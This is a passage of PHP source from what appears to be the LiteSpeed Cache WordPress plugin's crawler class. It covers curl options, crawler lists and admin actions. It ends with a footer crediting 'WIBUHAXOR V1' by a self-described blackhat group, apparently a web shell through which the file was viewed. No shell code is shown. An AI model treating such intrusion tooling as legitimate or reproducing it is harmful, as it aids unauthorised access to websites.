CURL_HTTP_VERSION_1_1; // $options[ CURL_HTTP_VERSION_2 ] = 1; // if is walker // $options[ CURLOPT_FRESH_CONNECT ] = true; // Referer if (isset($_SERVER['HTTP_HOST']) && isset($_SERVER['REQUEST_URI'])) { $options[CURLOPT_REFERER] = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; } // User Agent if ($crawler_only) { if (strpos($this->_crawler_conf['ua'], self::FAST_USER_AGENT) !== 0) { $this->_crawler_conf['ua'] = self::FAST_USER_AGENT . ' ' . $this->_crawler_conf['ua']; } } $options[CURLOPT_USERAGENT] = $this->_crawler_conf['ua']; // Cookies $cookies = array(); foreach ($this->_crawler_conf['cookies'] as $k => $v) { if (!$v) { continue; } $cookies[] = $k . '=' . urlencode($v); } if ($cookies) { $options[CURLOPT_COOKIE] = implode('; ', $cookies); } return $options; } /** * Self curl to get HTML content * * @since 3.3 */ public function self_curl( $url, $ua, $uid = false, $accept = false ) { // $accept not in use yet $this->_crawler_conf['base'] = site_url(); $this->_crawler_conf['ua'] = $ua; if ($accept) { $this->_crawler_conf['headers'] = array( 'Accept: ' . $accept ); } $options = $this->_get_curl_options(); if ($uid) { $this->_crawler_conf['cookies']['litespeed_flash_hash'] = Router::cls()->get_flash_hash($uid); $parsed_url = parse_url($url); if (!empty($parsed_url['host'])) { $dom = $parsed_url['host']; $port = defined('LITESPEED_CRAWLER_LOCAL_PORT') ? LITESPEED_CRAWLER_LOCAL_PORT : '443'; // TODO: need to test port? $resolved = $dom . ':' . $port . ':' . $this->_server_ip; $options[CURLOPT_RESOLVE] = array( $resolved ); $options[CURLOPT_DNS_USE_GLOBAL_CACHE] = false; $options[CURLOPT_PORT] = $port; self::debug('Resolved DNS for ' . $resolved); } } $options[CURLOPT_HEADER] = false; $options[CURLOPT_FOLLOWLOCATION] = true; $ch = curl_init(); curl_setopt_array($ch, $options); curl_setopt($ch, CURLOPT_URL, $url); $result = curl_exec($ch); $code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($code != 200) { self::debug('β Response code is not 200 in self_curl() [code] ' . var_export($code, true)); return false; } return $result; } /** * Terminate crawling * * @since 1.1.0 * @access private */ private function _terminate_running() { $this->_map_status_list = $this->cls('Crawler_Map')->save_map_status($this->_map_status_list, $this->_summary['curr_crawler']); if ($this->_end_reason == 'end') { // Current crawler is fully done // $end_reason = sprintf( __( 'Crawler %s reached end of sitemap file.', 'litespeed-cache' ), '#' . ( $this->_summary['curr_crawler'] + 1 ) ); ++$this->_summary['curr_crawler']; // Jump to next crawler // $this->_summary[ 'crawler_stats' ][ $this->_summary[ 'curr_crawler' ] ] = array(); // reset this at next crawl time $this->_summary['last_pos'] = 0; // reset last position $this->_summary['last_crawler_total_cost'] = time() - $this->_summary['curr_crawler_beginning_time']; $count_crawlers = count($this->list_crawlers()); if ($this->_summary['curr_crawler'] >= $count_crawlers) { self::debug('_terminate_running Touched end, whole crawled. Reload crawler!'); $this->_summary['curr_crawler'] = 0; // $this->_summary[ 'crawler_stats' ][ $this->_summary[ 'curr_crawler' ] ] = array(); $this->_summary['done'] = 'touchedEnd'; // log done status $this->_summary['last_full_time_cost'] = time() - $this->_summary['this_full_beginning_time']; } } $this->_summary['last_status'] = 'stopped'; $this->_summary['is_running'] = 0; $this->_summary['end_reason'] = $this->_end_reason; self::save_summary(); } /** * List all crawlers ( tagA => [ valueA => titleA, ... ] ...) * * @since 1.9.1 * @access public */ public function list_crawlers() { if ($this->_crawlers) { return $this->_crawlers; } $crawler_factors = array(); // Add default Guest crawler $crawler_factors['uid'] = array( 0 => __('Guest', 'litespeed-cache') ); // WebP on/off if ($this->conf(Base::O_IMG_OPTM_WEBP)) { $crawler_factors['webp'] = array( 1 => $this->cls('Media')->next_gen_image_title() ); if (apply_filters('litespeed_crawler_webp', false)) { $crawler_factors['webp'][0] = ''; } } // Guest Mode on/off if ($this->conf(Base::O_GUEST)) { $vary_name = $this->cls('Vary')->get_vary_name(); $vary_val = 'guest_mode:1'; if (!defined('LSCWP_LOG')) { $vary_val = md5($this->conf(Base::HASH) . $vary_val); } $crawler_factors['cookie:' . $vary_name] = array( $vary_val => '', '_null' => '<font data-balloon-pos="up" aria-label="Guest Mode">π</font>', ); } // Mobile crawler if ($this->conf(Base::O_CACHE_MOBILE)) { $crawler_factors['mobile'] = array( 1 => '<font data-balloon-pos="up" aria-label="Mobile">π±</font>', 0 => '', ); } // Get roles set // List all roles foreach ($this->conf(Base::O_CRAWLER_ROLES) as $v) { $role_title = ''; $udata = get_userdata($v); if (isset($udata->roles) && is_array($udata->roles)) { $tmp = array_values($udata->roles); $role_title = array_shift($tmp); } if (!$role_title) { continue; } $crawler_factors['uid'][$v] = ucfirst($role_title); } // Cookie crawler foreach ($this->conf(Base::O_CRAWLER_COOKIES) as $v) { if (empty($v['name'])) { continue; } $this_cookie_key = 'cookie:' . $v['name']; $crawler_factors[$this_cookie_key] = array(); foreach ($v['vals'] as $v2) { $crawler_factors[$this_cookie_key][$v2] = $v2 == '_null' ? '' : '<font data-balloon-pos="up" aria-label="Cookie">πͺ</font>' . esc_html($v['name']) . '=' . esc_html($v2); } } // Crossing generate the crawler list $this->_crawlers = $this->_recursive_build_crawler($crawler_factors); return $this->_crawlers; } /** * Build a crawler list recursively * * @since 2.8 * @access private */ private function _recursive_build_crawler( $crawler_factors, $group = array(), $i = 0 ) { $current_factor = array_keys($crawler_factors); $current_factor = $current_factor[$i]; $if_touch_end = $i + 1 >= count($crawler_factors); $final_list = array(); foreach ($crawler_factors[$current_factor] as $k => $v) { // Don't alter $group bcos of loop usage $item = $group; $item['title'] = !empty($group['title']) ? $group['title'] : ''; if ($v) { if ($item['title']) { $item['title'] .= ' - '; } $item['title'] .= $v; } $item[$current_factor] = $k; if ($if_touch_end) { $final_list[] = $item; } else { // Inception: next layer $final_list = array_merge($final_list, $this->_recursive_build_crawler($crawler_factors, $item, $i + 1)); } } return $final_list; } /** * Return crawler meta file local path * * @since 6.1 * @access public */ public function json_local_path() { // if (!file_exists(LITESPEED_STATIC_DIR . '/crawler/' . $this->_sitemeta)) { // return false; // } return LITESPEED_STATIC_DIR . '/crawler/' . $this->_sitemeta; } /** * Return crawler meta file * * @since 1.1.0 * @access public */ public function json_path() { if (!file_exists(LITESPEED_STATIC_DIR . '/crawler/' . $this->_sitemeta)) { return false; } return LITESPEED_STATIC_URL . '/crawler/' . $this->_sitemeta; } /** * Create reset pos file * * @since 1.1.0 * @access public */ public function reset_pos() { File::save($this->_resetfile, time(), true); self::save_summary(array( 'is_running' => 0 )); } /** * Display status based by matching crawlers order * * @since 3.0 * @access public */ public function display_status( $status_row, $reason_set ) { if (!$status_row) { return ''; } $_status_list = array( '-' => 'default', self::STATUS_MISS => 'primary', self::STATUS_HIT => 'success', self::STATUS_BLACKLIST => 'danger', self::STATUS_NOCACHE => 'warning', ); $reason_set = explode(',', $reason_set); $status = ''; foreach (str_split($status_row) as $k => $v) { $reason = $reason_set[$k]; if ($reason == 'Man') { $reason = __('Manually added to blocklist', 'litespeed-cache'); } if ($reason == 'Existed') { $reason = __('Previously existed in blocklist', 'litespeed-cache'); } if ($reason) { $reason = 'data-balloon-pos="up" aria-label="' . $reason . '"'; } $status .= '<i class="litespeed-dot litespeed-bg-' . $_status_list[$v] . '" ' . $reason . '>' . ($k + 1) . '</i>'; } return $status; } /** * Output info and exit * * @since 1.1.0 * @access protected * @param string $msg Error info */ protected function output( $msg ) { if (wp_doing_cron()) { echo $msg; // exit(); } else { echo "<script>alert('" . htmlspecialchars($msg) . "');</script>"; // exit; } } /** * Handle all request actions from main cls * * @since 3.0 * @access public */ public function handler() { $type = Router::verify_type(); switch ($type) { case self::TYPE_REFRESH_MAP: $this->cls('Crawler_Map')->gen(true); break; case self::TYPE_EMPTY: $this->cls('Crawler_Map')->empty_map(); break; case self::TYPE_BLACKLIST_EMPTY: $this->cls('Crawler_Map')->blacklist_empty(); break; case self::TYPE_BLACKLIST_DEL: if (!empty($_GET['id'])) { $this->cls('Crawler_Map')->blacklist_del($_GET['id']); } break; case self::TYPE_BLACKLIST_ADD: if (!empty($_GET['id'])) { $this->cls('Crawler_Map')->blacklist_add($_GET['id']); } break; case self::TYPE_START: // Handle the ajax request to proceed crawler manually by admin self::start_async(); break; case self::TYPE_RESET: $this->reset_pos(); break; default: break; } Admin::redirect(); } }
Β© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat